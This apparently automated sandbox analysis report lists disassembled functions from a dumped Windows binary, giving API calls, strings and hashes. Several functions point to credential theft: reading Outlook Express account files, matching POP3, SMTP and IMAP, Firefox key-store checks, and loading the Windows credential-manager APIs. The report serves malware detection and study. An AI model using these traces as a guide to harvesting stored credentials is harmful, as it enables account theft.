Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: memcpystrlen$memsetsprintf
String ID: %s (%s)
API String ID: 3756086014-1363028141
Opcode ID: 873fc1bbfb6a5d8165db9a561727e61c15b034d285d3a1034200a0b0b8c5b510
Instruction ID: 49fd0969a141bf365c85b2e85b726abfc67c7a4f8a3ab277a670c68284d415ec
Opcode Fuzzy Hash: 873fc1bbfb6a5d8165db9a561727e61c15b034d285d3a1034200a0b0b8c5b510
Instruction Fuzzy Hash: 9A1193B1800118AFEB21DF59CD45F99B7ACEF41308F008466FA48EB106D275AB15CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00443683, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1

GetFileSize.KERNEL32(00000000,00000000,?,00000000,.8D,00443752,?,?,*.oeaccount,.8D,?,00000104), ref: 0044369D
??2@YAPAXI@Z.MSVCRT ref: 004436AF
SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004436BE

Part of subcall function 004072EF: ReadFile.KERNEL32(00000000,?,004436D1,00000000,00000000,?,?,004436D1,?,00000000), ref: 00407306

Part of subcall function 00443546: wcslen.MSVCRT ref: 00443559
Part of subcall function 00443546: ??2@YAPAXI@Z.MSVCRT ref: 00443562
Part of subcall function 00443546: WideCharToMultiByte.KERNEL32(00000000,00000000,004436E8,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004436E8,?,00000000), ref: 0044357B
Part of subcall function 00443546: strlen.MSVCRT ref: 004435BE
Part of subcall function 00443546: memcpy.MSVCRT ref: 004435D8
Part of subcall function 00443546: ??3@YAXPAX@Z.MSVCRT ref: 0044366B

??3@YAXPAX@Z.MSVCRT ref: 004436E9
CloseHandle.KERNEL32(?), ref: 004436F3

Strings

.8D, xrefs: 00443683

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
String ID: .8D
API String ID: 1886237854-2881260426
Opcode ID: 2fcef2379917d8a12b2531ee488188fbf772f653b84b2ead5df350947d92357f
Instruction ID: b4a99ca98ea4b9fd05b978b53b3f03ecc28babd8507da3569ede40c7aa85cfb3
Opcode Fuzzy Hash: 2fcef2379917d8a12b2531ee488188fbf772f653b84b2ead5df350947d92357f
Instruction Fuzzy Hash: 42012432804248BFEB206F75EC4ED9FBB6CEF46364B10812BF81487261DA358D14CA28

Uniqueness

Uniqueness Score: -1.00%

Function 0042AFBC, Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 264COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0042B023

Strings

ORDER, xrefs: 0042B20F
aggregate functions are not allowed in the GROUP BY clause, xrefs: 0042B2DA
H, xrefs: 0042B121
a GROUP BY clause is required before HAVING, xrefs: 0042B2C6
GROUP, xrefs: 0042B23F

Memory Dump Source

Source File: 00000017.00000001.609694889.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000001.610162970.000000000044F000.00000040.00020000.sdmp Download File
Associated: 00000017.00000001.610182009.0000000000452000.00000040.00020000.sdmp Download File

Similarity

API ID: memset
String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
API String ID: 2221118986-3608744896
Opcode ID: 841bd29896e32bb859f31da3f4adc3699217c591586cbd070264be7b0c51f49a
Instruction ID: 2f235f6cca50cbc0634f5386d86f60eb89777bdc9be4f62a01007801531fb2a2
Opcode Fuzzy Hash: 841bd29896e32bb859f31da3f4adc3699217c591586cbd070264be7b0c51f49a
Instruction Fuzzy Hash: 4EA15571208311DFD724CF29E580A2BB7E1FF98314F91485EF8858B652E739E841CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00441E91, Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 259COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00441F4B

Part of subcall function 00441A6C: memcmp.MSVCRT ref: 00441AB5

Strings

RTRIM, xrefs: 00441FEA
BINARY, xrefs: 00441F9D, 00441FA2, 00441FB2, 00441FC2, 00442008
temp, xrefs: 004420FC
main, xrefs: 004420EC
NOCASE, xrefs: 00441FD6

Memory Dump Source

Source File: 00000017.00000001.609694889.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000001.610162970.000000000044F000.00000040.00020000.sdmp Download File
Associated: 00000017.00000001.610182009.0000000000452000.00000040.00020000.sdmp Download File

Similarity

API ID: memcmpmemcpy
String ID: BINARY$NOCASE$RTRIM$main$temp
API String ID: 1784268899-4153596280
Opcode ID: 31735534d2cf4d8ddbac7f5ef5d005a99950ecc2e34341eadd462de4646b3436
Instruction ID: db602eaa8e833254b0c0c9be43f42c24c685b457dfa8f14c56b0ec28138b2128
Opcode Fuzzy Hash: 31735534d2cf4d8ddbac7f5ef5d005a99950ecc2e34341eadd462de4646b3436
Instruction Fuzzy Hash: 5091E2B1900700AFE730AF25C981A9EBBE5AB44304F14492FF14697392C7B9A985CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00441E91, Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 259COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00441F4B

Part of subcall function 00441A6C: memcmp.MSVCRT ref: 00441AB5

Strings

temp, xrefs: 004420FC
BINARY, xrefs: 00441F9D, 00441FA2, 00441FB2, 00441FC2, 00442008
RTRIM, xrefs: 00441FEA
NOCASE, xrefs: 00441FD6
main, xrefs: 004420EC

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: memcmpmemcpy
String ID: BINARY$NOCASE$RTRIM$main$temp
API String ID: 1784268899-4153596280
Opcode ID: 6b6b8ae9c0e91365de8150e640e5bb5f4ec7e5282d2e56bc441d5ca3420a582e
Instruction ID: db602eaa8e833254b0c0c9be43f42c24c685b457dfa8f14c56b0ec28138b2128
Opcode Fuzzy Hash: 6b6b8ae9c0e91365de8150e640e5bb5f4ec7e5282d2e56bc441d5ca3420a582e
Instruction Fuzzy Hash: 5091E2B1900700AFE730AF25C981A9EBBE5AB44304F14492FF14697392C7B9A985CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004258FD, Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 222COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00425AA4

Strings

unknown error, xrefs: 00426E65
SA, xrefs: 00425A39, 00425A85
abort due to ROLLBACK, xrefs: 00427E13, 00427E1B
statement aborts at %d: [%s] %s, xrefs: 0042525A
^SA, xrefs: 00425B61

Memory Dump Source

Source File: 00000017.00000001.609694889.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000001.610162970.000000000044F000.00000040.00020000.sdmp Download File
Associated: 00000017.00000001.610182009.0000000000452000.00000040.00020000.sdmp Download File

Similarity

API ID: memset
String ID: SA$^SA$abort due to ROLLBACK$statement aborts at %d: [%s] %s$unknown error
API String ID: 2221118986-2983132044
Opcode ID: 9cbe5c8baad93ebb7c83932a759bf5a980d18dc58a8e740d893fffb7be770e48
Instruction ID: d9d4ef9a939abb9398974d8009f310ef78d4b48c933898c6b53613fdd3c8cec1
Opcode Fuzzy Hash: 9cbe5c8baad93ebb7c83932a759bf5a980d18dc58a8e740d893fffb7be770e48
Instruction Fuzzy Hash: 5F915AB1E00629EFDB24CF68E481AADBBB1FF08314F54409BE405A7740D739A981CF99

Uniqueness

Uniqueness Score: -1.00%

Function 004259F2, Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 165COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00425AA4

Strings

SA, xrefs: 00425A39, 00425A85
statement aborts at %d: [%s] %s, xrefs: 0042525A
^SA, xrefs: 00425B61
2RA, xrefs: 004259F3
string or blob too big, xrefs: 00425229

Memory Dump Source

Source File: 00000017.00000001.609694889.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000001.610162970.000000000044F000.00000040.00020000.sdmp Download File
Associated: 00000017.00000001.610182009.0000000000452000.00000040.00020000.sdmp Download File

Similarity

API ID: memset
String ID: SA$2RA$^SA$statement aborts at %d: [%s] %s$string or blob too big
API String ID: 2221118986-3971000493
Opcode ID: 499dd02ae76916be3b6b15ca67e35c2363dbc33829666da8c6ff76c834f06f8c
Instruction ID: 6b39af4d27fcf0b5b6a834b15004499d6a443c250807a1f7536e01ba46d4d054
Opcode Fuzzy Hash: 499dd02ae76916be3b6b15ca67e35c2363dbc33829666da8c6ff76c834f06f8c
Instruction Fuzzy Hash: 4F615A71A00629DFCB14CFA9E481AADBBF1FF08304F54419AE845A7741D739B981CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0040FB27, Relevance: 9.1, APIs: 6, Instructions: 142COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040F7DE,00000000,00000000), ref: 0040FB5E
memset.MSVCRT ref: 0040FBBB
memset.MSVCRT ref: 0040FBCD

Part of subcall function 0040FA44: _mbscpy.MSVCRT ref: 0040FA6A

memset.MSVCRT ref: 0040FCB4
_mbscpy.MSVCRT ref: 0040FCD9
CloseHandle.KERNEL32(00000000,0040F7DE,?), ref: 0040FD23

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$_mbscpy$CloseHandleOpenProcess
String ID:
API String ID: 3974772901-0
Opcode ID: e3e035998a686eac936ab22a4359b8e37823d0ec61e8259700ca388e65ff3bfe
Instruction ID: 4cd0dab2c11de29b1205cc267bdcfe4bbed2ca853fb67bca61950d18440e6937
Opcode Fuzzy Hash: e3e035998a686eac936ab22a4359b8e37823d0ec61e8259700ca388e65ff3bfe
Instruction Fuzzy Hash: 79511EB590021CABDB60DF95DD85ADEBBB8FF44305F1000BAE609A2281D7759E84CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00443546, Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00443559
??2@YAPAXI@Z.MSVCRT ref: 00443562
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 0044357B

Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 0044288D
Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 004428AB
Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 004428C6
Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 004428EF
Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 00442913

strlen.MSVCRT ref: 004435BE

Part of subcall function 004429E9: ??3@YAXPAX@Z.MSVCRT ref: 004429F4
Part of subcall function 004429E9: ??2@YAPAXI@Z.MSVCRT ref: 00442A03

memcpy.MSVCRT ref: 004435D8
??3@YAXPAX@Z.MSVCRT ref: 0044366B

Memory Dump Source

Source File: 00000017.00000001.609694889.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000001.610162970.000000000044F000.00000040.00020000.sdmp Download File
Associated: 00000017.00000001.610182009.0000000000452000.00000040.00020000.sdmp Download File

Similarity

API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
String ID:
API String ID: 577244452-0
Opcode ID: 38d8c8f7e931b45e1f6d8b368548bb851e8bea4da3ae43928d56f9be902cd2e3
Instruction ID: ed198900897cbedb477538fc3de06edee324e7a25cf08c3aedaf46951cf6a217
Opcode Fuzzy Hash: 38d8c8f7e931b45e1f6d8b368548bb851e8bea4da3ae43928d56f9be902cd2e3
Instruction Fuzzy Hash: 14318672804219AFEF21EF65C8819DEBBB5EF45314F5480AAF108A3200CB396F84DF49

Uniqueness

Uniqueness Score: -1.00%

Function 00404469, Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 75COMMON

Download Yara Rule

APIs

Part of subcall function 00406CA4: strlen.MSVCRT ref: 00406CA9
Part of subcall function 00406CA4: memcpy.MSVCRT ref: 00406CBE

_strcmpi.MSVCRT ref: 004044FA
_strcmpi.MSVCRT ref: 00404518

Strings

pop3, xrefs: 004044F4
smtp, xrefs: 0040452F
imap, xrefs: 00404512

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: _strcmpi$memcpystrlen
String ID: imap$pop3$smtp
API String ID: 2025310588-821077329
Opcode ID: 8c24a990bd80c02794b9e2039fef12db41580770a980123b25ad20a48f8d51f9
Instruction ID: ee17be80c36da3591ff53c386c7625c128025028662cc5e87d89578f4f8b6d75
Opcode Fuzzy Hash: 8c24a990bd80c02794b9e2039fef12db41580770a980123b25ad20a48f8d51f9
Instruction Fuzzy Hash: C42196B25046189BEB51DB15CD417DAB3FCEF90304F10006BE79AB7181DB787B498B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040BD68, Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040BD88

Part of subcall function 00408B27: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408BF0
Part of subcall function 00408B27: memcpy.MSVCRT ref: 00408C2F

Part of subcall function 00408B27: _mbscpy.MSVCRT ref: 00408BA2
Part of subcall function 00408B27: strlen.MSVCRT ref: 00408BC0

Part of subcall function 00407446: memset.MSVCRT ref: 00407466
Part of subcall function 00407446: sprintf.MSVCRT ref: 00407493
Part of subcall function 00407446: strlen.MSVCRT ref: 0040749F
Part of subcall function 00407446: memcpy.MSVCRT ref: 004074B4
Part of subcall function 00407446: strlen.MSVCRT ref: 004074C2
Part of subcall function 00407446: memcpy.MSVCRT ref: 004074D2

Part of subcall function 00407279: _mbscpy.MSVCRT ref: 004072DF

Strings

txt, xrefs: 0040BE38, 0040BE3B
*.csv, xrefs: 0040BE03
*.htm;*.html, xrefs: 0040BDCE
*.txt, xrefs: 0040BDA1
*.xml, xrefs: 0040BDF7

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
API String ID: 2726666094-3614832568
Opcode ID: b288ec7bca60fb1d5affba5d04cd1bcc9a0d0005558db0f804adbfe3bfda307d
Instruction ID: 9cc38d581f61d2a6594629c27ef9ad5a8c62d4d42b688fbaa09f609bba3e4d8d
Opcode Fuzzy Hash: b288ec7bca60fb1d5affba5d04cd1bcc9a0d0005558db0f804adbfe3bfda307d
Instruction Fuzzy Hash: 0121FBB1C002599ADB40EFA5D981BDDBBB4AB08308F10517EF548B6281DB382A45CB9E

Uniqueness

Uniqueness Score: -1.00%

Function 00403A53, Relevance: 9.1, APIs: 6, Instructions: 56filestringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00403A78
memset.MSVCRT ref: 00403A91
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AA8
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AC7
strlen.MSVCRT ref: 00403AD9
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AEA

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: ByteCharMultiWidememset$FileWritestrlen
String ID:
API String ID: 1786725549-0
Opcode ID: 02e0e514b43461fd7f4aa61425be211fa1e164091b4d1c305689ae28f2153cbf
Instruction ID: 3c11530c7ff43e2cab0ee1a3c4b7d34204fc8064c5823527b9b114d7af9e1f20
Opcode Fuzzy Hash: 02e0e514b43461fd7f4aa61425be211fa1e164091b4d1c305689ae28f2153cbf
Instruction Fuzzy Hash: 50112DBA80412CBFFB10AB94DC85EEBB3ADEF09355F0001A6B715D2092D6359F548B78

Uniqueness

Uniqueness Score: -1.00%

Function 0040BE9E, Relevance: 9.1, APIs: 6, Instructions: 54fileclipboardCOMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000104,?), ref: 0040BEB8
GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040BECA
GetTempFileNameA.KERNEL32(?,00446634,00000000,?), ref: 0040BEEC
OpenClipboard.USER32(?), ref: 0040BF0C
GetLastError.KERNEL32 ref: 0040BF25
DeleteFileA.KERNEL32(00000000), ref: 0040BF42

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
String ID:
API String ID: 2014771361-0
Opcode ID: f1e64fb6be10128bbee6f3e595a742589036f7cac5447e39c680a47d04657e65
Instruction ID: 907fbb9bc954c15d9eb0ad6f98a85717611d4d669dd49ad048df0fde8b6b2f4b
Opcode Fuzzy Hash: f1e64fb6be10128bbee6f3e595a742589036f7cac5447e39c680a47d04657e65
Instruction Fuzzy Hash: 5B11A1B6900218ABDF20AB61DC49FDB77BCAB11701F0000B6B685E2092DBB499C48F68

Uniqueness

Uniqueness Score: -1.00%

Function 00406113, Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 00406129

Part of subcall function 00406057: memcmp.MSVCRT ref: 00406075
Part of subcall function 00406057: memcpy.MSVCRT ref: 004060A4
Part of subcall function 00406057: memcpy.MSVCRT ref: 004060B9

memcmp.MSVCRT ref: 00406154
memcmp.MSVCRT ref: 0040617C
memcpy.MSVCRT ref: 00406199

Strings

global-salt, xrefs: 00406174
password-check, xrefs: 0040614C

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: memcmp$memcpy
String ID: global-salt$password-check
API String ID: 231171946-3927197501
Opcode ID: e64782263ff5605526e0fe757cea6ed3191f710ccf3b0afa5e67e353afe61262
Instruction ID: 655c6eb068c7835b63414ef3c9938ae25085d91347c247b77763f6b5778615a8
Opcode Fuzzy Hash: e64782263ff5605526e0fe757cea6ed3191f710ccf3b0afa5e67e353afe61262
Instruction Fuzzy Hash: E301D8B954070466FF202A628C42B8B37585F51758F024137FD067D2D3E37E87748A4E

Uniqueness

Uniqueness Score: -1.00%

Function 00442960, Relevance: 9.0, APIs: 6, Instructions: 46COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT ref: 0044296E
??3@YAXPAX@Z.MSVCRT ref: 00442989
??3@YAXPAX@Z.MSVCRT ref: 0044299F
??3@YAXPAX@Z.MSVCRT ref: 004429B5
??3@YAXPAX@Z.MSVCRT ref: 004429CB
??3@YAXPAX@Z.MSVCRT ref: 004429E1

Memory Dump Source

Source File: 00000017.00000001.609694889.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000001.610162970.000000000044F000.00000040.00020000.sdmp Download File
Associated: 00000017.00000001.610182009.0000000000452000.00000040.00020000.sdmp Download File

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: c5de1a626e10c8c3fd55c83847b3f005b6d1a5fa46efc77fcdfa66a0c8cfbbda
Instruction ID: 5b630ca211e00ee6ab232d4f5fe81ba50f7f923f282134244f429d4b925a3085
Opcode Fuzzy Hash: c5de1a626e10c8c3fd55c83847b3f005b6d1a5fa46efc77fcdfa66a0c8cfbbda
Instruction Fuzzy Hash: 7501A272E0AD31A7E1257A76554135BE3686F04B29F05024FB904772428B6C7C5445DE

Uniqueness

Uniqueness Score: -1.00%

Function 00401693, Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 004016A2
GetSystemMetrics.USER32(00000015), ref: 004016B0
GetSystemMetrics.USER32(00000014), ref: 004016BC
BeginPaint.USER32(?,?), ref: 004016D6
DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E5
EndPaint.USER32(?,?), ref: 004016F2

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
String ID:
API String ID: 19018683-0
Opcode ID: d93d450dc478f7866c229f4a037813e0caab4cabbf567c971482d52d831a5164
Instruction ID: 724a62348f30ed3062fc78c586e299175c66965872e24402369681ac2eeab922
Opcode Fuzzy Hash: d93d450dc478f7866c229f4a037813e0caab4cabbf567c971482d52d831a5164
Instruction Fuzzy Hash: 0701FB76900619AFDF04DFA8DC499FE7BBDFB45301F00046AEA11AB295DAB1A914CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0040C319, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 162windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?), ref: 0040C352
SetFocus.USER32(?,?,?), ref: 0040C3F8
InvalidateRect.USER32(?,00000000,00000000), ref: 0040C4F5

Strings

rY@, xrefs: 0040C51E
XgD, xrefs: 0040C3FE

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: DestroyFocusInvalidateRectWindow
String ID: XgD$rY@
API String ID: 3502187192-1347721759
Opcode ID: 5c78a1ecd43bd4835c24ecfbdc30f3a6dc3cc59a809a6a48b47028dbbb114125
Instruction ID: f774ea8d8eb1800fd2ad86f321479c1d669f6cdc6fcff53b53818c93aeeaee42
Opcode Fuzzy Hash: 5c78a1ecd43bd4835c24ecfbdc30f3a6dc3cc59a809a6a48b47028dbbb114125
Instruction Fuzzy Hash: 6F518630A04701DBCB34BB658885D9AB3E0BF51724F44C63FF4656B2E2C779A9818B8D

Uniqueness

Uniqueness Score: -1.00%

Function 004062D9, Relevance: 8.9, APIs: 7, Instructions: 157COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00406376
memcpy.MSVCRT ref: 00406389
memcpy.MSVCRT ref: 0040639C

Part of subcall function 00404883: memset.MSVCRT ref: 004048BD
Part of subcall function 00404883: memset.MSVCRT ref: 004048D1
Part of subcall function 00404883: memset.MSVCRT ref: 004048E5
Part of subcall function 00404883: memcpy.MSVCRT ref: 004048F7
Part of subcall function 00404883: memcpy.MSVCRT ref: 00404909

memcpy.MSVCRT ref: 004063E0
memcpy.MSVCRT ref: 004063F3
memcpy.MSVCRT ref: 00406420
memcpy.MSVCRT ref: 00406435

Part of subcall function 0040625B: memcpy.MSVCRT ref: 00406287

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: memcpy$memset
String ID:
API String ID: 438689982-0
Opcode ID: c11b14cc7bfefcbecd474d69538c451392e9e517f6ba4719ba6800d6460efb6e
Instruction ID: a962c966a65fcbb98db0a5903e2df7d2d9caef1a51b72161af640e80cc8fe1a9
Opcode Fuzzy Hash: c11b14cc7bfefcbecd474d69538c451392e9e517f6ba4719ba6800d6460efb6e
Instruction Fuzzy Hash: 744140B290050DBEEB51DAE8CC41EEFBB7CAB4C704F004476F704F6051E635AA598BA6

Uniqueness

Uniqueness Score: -1.00%

Function 00443E22, Relevance: 8.9, APIs: 7, Instructions: 147stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00443E43
memset.MSVCRT ref: 00443E5C
memset.MSVCRT ref: 00443E70

Part of subcall function 00443946: strlen.MSVCRT ref: 00443953

strlen.MSVCRT ref: 00443E8C
memcpy.MSVCRT ref: 00443EB1
memcpy.MSVCRT ref: 00443EC7
memcpy.MSVCRT ref: 00443F07

Memory Dump Source

Source File: 00000017.00000001.609694889.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000001.610162970.000000000044F000.00000040.00020000.sdmp Download File
Associated: 00000017.00000001.610182009.0000000000452000.00000040.00020000.sdmp Download File

Similarity

API ID: memcpymemset$strlen
String ID:
API String ID: 2142929671-0
Opcode ID: 1afd66649f8684ee995baba145f878375b01f91d4b65dd06ff442cb19840d2b4
Instruction ID: 7aa756fa7cbdb75c5c05895f31091f080fe59031f56f6a961c38bdf577465876
Opcode Fuzzy Hash: 1afd66649f8684ee995baba145f878375b01f91d4b65dd06ff442cb19840d2b4
Instruction Fuzzy Hash: 5D513BB290011EAADB10EF55CC81AEEB3B9BF44218F5445BAE509E7141EB34AB49CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00408B27, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100stringCOMMON

Download Yara Rule

APIs

_mbscpy.MSVCRT ref: 00408BA2

Part of subcall function 00408FB1: _itoa.MSVCRT ref: 00408FD2

strlen.MSVCRT ref: 00408BC0
LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408BF0
memcpy.MSVCRT ref: 00408C2F

Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408ACD
Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408AEB
Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408B09
Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408B19

Strings

strings, xrefs: 00408B98

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: ??2@$LoadString_itoa_mbscpymemcpystrlen
String ID: strings
API String ID: 4036804644-3030018805
Opcode ID: 0fd902f6738d83e31f1c70b21910d8c3d9af8e9046e4f58e96e5244c1996bb6b
Instruction ID: 2fb35d0cb8d6515d264437a76ba5de351b7eb647a908b3ccb3b2e5853623431c
Opcode Fuzzy Hash: 0fd902f6738d83e31f1c70b21910d8c3d9af8e9046e4f58e96e5244c1996bb6b
Instruction Fuzzy Hash: 9F3136B95003019FEB149B18EE40E323776EB59346B14443EF845A72B3DB39E815CB5C

Uniqueness

Uniqueness Score: -1.00%

Function 0040F057, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00404666: _mbscpy.MSVCRT ref: 004046B5

Part of subcall function 004045D6: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F07D,?,00000000), ref: 004045E3
Part of subcall function 004045D6: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004045FC
Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredFree), ref: 00404608
Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404614
Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404620
Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040462C

Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F123
strlen.MSVCRT ref: 0040F133
_mbscpy.MSVCRT ref: 0040F144
LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F151
